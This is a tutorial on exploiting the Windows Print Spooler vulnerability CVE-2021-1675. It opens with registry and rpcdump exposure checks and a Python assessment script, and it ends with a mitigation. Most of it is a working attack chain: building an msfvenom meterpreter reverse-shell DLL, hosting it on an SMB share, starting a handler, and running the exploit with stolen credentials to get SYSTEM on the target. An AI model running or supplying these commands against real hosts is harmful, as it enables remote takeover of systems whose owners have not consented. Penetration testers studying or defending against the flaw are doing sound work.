This is a remote code execution vulnerability disclosed on June 1st 2021. The exploit takes advantage of the Print Spooler service running as SYSTEM and allows remote code execution as the SYSTEM user. The exploit does require valid user credentials, which makes this an excellent Windows privilege escalation tool to add to your arsenal.
Microsoft has released a patch to mitigate these attacks, but if the registry values below are present on a machine (driver installation not restricted to administrators, and the install warning/elevation prompt suppressed), then the machine will still be vulnerable even with the patch applied:
    REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

    HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
        RestrictDriverInstallationToAdministrators    REG_DWORD    0x0
        NoWarningNoElevationOnInstall                 REG_DWORD    0x1
Impacket's rpcdump.py can also test a host remotely by listing the RPC interfaces it exposes. If the tool returns either of the Protocol results below, the Print Spooler is reachable over RPC and the host could be vulnerable:
    rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

    Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
    Protocol: [MS-RPRN]: Print System Remote Protocol
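As an added example (not from the original post), the following Python parses the two outputs shown above, a `reg query` dump of the PointAndPrint key and the filtered rpcdump.py listing, and reports whether a host still shows the state described as vulnerable. The sample outputs are constructed to mirror the ones above; absent registry values are treated as 0, which errs on the side of reporting exposure.

```python
import re

# Constructed sample of `reg query` output for the PointAndPrint key, in the same
# shape as the output shown above (both weakening values present).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x0
    NoWarningNoElevationOnInstall    REG_DWORD    0x1
"""

# Constructed sample of rpcdump.py output after the egrep 'MS-RPRN|MS-PAR' filter.
SAMPLE_RPCDUMP = """
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
"""

REG_DWORD_LINE = re.compile(r"^[ \t]*(\S+)[ \t]+REG_DWORD[ \t]+0x([0-9A-Fa-f]+)[ \t]*$", re.MULTILINE)
SPOOLER_PROTOCOL = re.compile(r"Protocol: \[(MS-RPRN|MS-PAR)\]")


def parse_point_and_print(reg_output: str) -> dict:
    """Map each REG_DWORD value name in a `reg query` dump to its integer value."""
    return {name: int(hexval, 16) for name, hexval in REG_DWORD_LINE.findall(reg_output)}


def point_and_print_weakened(values: dict) -> bool:
    """True when driver installs are not restricted to administrators AND the install
    warning/elevation is suppressed (the registry state the page calls still-vulnerable).
    A value missing from the key is treated as 0, i.e. policy not set."""
    restrict = values.get("RestrictDriverInstallationToAdministrators", 0)
    no_warning = values.get("NoWarningNoElevationOnInstall", 0)
    return restrict == 0 and no_warning == 1


def spooler_protocols(rpcdump_output: str) -> list:
    """Return the spooler RPC protocols (MS-RPRN / MS-PAR) that rpcdump.py listed, sorted."""
    return sorted(set(SPOOLER_PROTOCOL.findall(rpcdump_output)))


def assess(reg_output: str, rpcdump_output: str) -> dict:
    """Combine both checks into one finding; exposure needs the spooler reachable over RPC
    and the weakened Point and Print settings (the page's fix is to disable the Spooler)."""
    protocols = spooler_protocols(rpcdump_output)
    weakened = point_and_print_weakened(parse_point_and_print(reg_output))
    return {
        "spooler_rpc_exposed": bool(protocols),
        "protocols": protocols,
        "point_and_print_weakened": weakened,
        "still_exposed": bool(protocols) and weakened,
    }


if __name__ == "__main__":
    print(assess(SAMPLE_REG_QUERY, SAMPLE_RPCDUMP))
```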
The exploit requires the latest version of Impacket (the cube0x0 fork cloned below), so remove any installed copy first:

    pip3 uninstall impacket
    git clone https://github.com/cube0x0/impacket
    cd impacket
    python3 ./setup.py install
Before executing the payload against the remote target we need three things:
- A payload to run as SYSTEM once the exploit has completed. The easiest option is to generate a reverse shell DLL with msfvenom.
- An SMB share on our machine hosting the payload.
- A handler to catch the shell (a multi/handler if we used a meterpreter payload).

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.240 LPORT=4444 -f dll > shelly.dll
Set up the SMB share

    smbserver.py share `pwd`

Note: `pwd` sets our current working directory as the shared directory. "share" is the name of the share and can be anything.
Start the multi/handler in msfconsole, with LHOST and LPORT matching the msfvenom payload

    use multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set LHOST 192.168.1.240
    set LPORT 4444
    run
Run the exploit, pointing it at the DLL on our share

    python3 CVE-2021-1675.py pwnme.local/smarsh:Password1@192.168.1.50 '\\192.168.1.240\share\shelly.dll'
Mitigation: stop and disable the Spooler service (run from an elevated PowerShell prompt; setting Start to 4 keeps it disabled across reboots)

    Stop-Service Spooler
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f